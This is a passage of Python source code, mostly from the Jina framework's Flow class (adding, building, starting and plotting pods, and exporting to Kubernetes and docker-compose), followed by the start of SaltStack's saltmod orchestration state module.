{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-before runtime
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
op_flow._pod_nodes[pod_name] = Pod(args, needs)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: if to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not _pod.external:
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
results_as_docarray=True,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if self._pod_nodes[need].external:
_s_role = 'EXTERNAL'
if self._pod_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
k8s_connection_pool: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param k8s_connection_pool: Boolean indicating wether the kubernetes connection pool should be used inside the Executor Runtimes.
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.pods.config.k8s import K8sPodConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._pod_nodes.items():
pod_base = os.path.join(output_base_path, node)
k8s_pod = K8sPodConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_connection_pool=k8s_connection_pool,
k8s_pod_addresses=self._get_k8s_pod_addresses(k8s_namespace)
if (node == 'gateway' and not k8s_connection_pool)
else None,
)
configs = k8s_pod.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(pod_base, f'{name}.yml')
os.makedirs(pod_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
def to_docker_compose_yaml(
self, output_path: Optional[str] = None, network_name: Optional[str] = None
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment name
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.pods.config.docker_compose import DockerComposeConfig
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._pod_nodes.items():
docker_compose_pod = DockerComposeConfig(
args=v.args,
pod_addresses=self._get_docker_compose_pod_addresses(),
)
service_configs = docker_compose_pod.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from jina.helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
saltmod.py
|
"""
Control the Salt command interface
==================================
This state is intended for use from the Salt Master. It provides access to
sending commands down to minions as well as access to executing master-side
modules. These state functions wrap Salt's :ref:`Python API <python-api>`.
.. versionadded:: 2016.11.0
Support for masterless minions was added to the ``salt.state`` function,
so they can run orchestration sls files. This is particularly useful when
the rendering of a state is dependent on the execution of another state.
Orchestration will render and execute each orchestration block
independently, while honoring requisites to ensure the states are applied
in the correct order.
.. seealso:: More Orchestrate documentation
* :ref:`Full Orchestrate Tutorial <orchestrate-runner>`
* :py:func:`The Orchestrate runner <salt.runners.state.orchestrate>`
"""
import fnmatch
import logging
import sys
import threading
import time
import salt.exceptions
import salt.output
import salt.syspaths
import salt.utils.data
import salt.utils.event
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "salt"
def __virtual__():
"""
Named salt
"""
return __virtualname__
def _fire_args(tag_data):
try:
salt.utils.event.fire_args(__opts__, __orchestration_jid__, tag_data, "run")
except NameError:
log.debug("Unable to fire args event due to missing __orchestration_jid__")
def _parallel_map(func, inputs):
"""
Applies a function to each element of a list, returning the resulting list.
A separate thread is created for each element in the input list and the
passed function is called for each of the elements. When all threads have
finished execution a list with the results corresponding to the inputs is
returned.
If one of the threads fails (because the function throws an exception),
that exception is reraised. If more than one thread fails, the exception
from the first thread (according to the index of the input element) is
reraised.
func:
function that is applied on each input element.
inputs:
list of elements that shall be processed. The length of this list also
defines the number of threads created.
"""
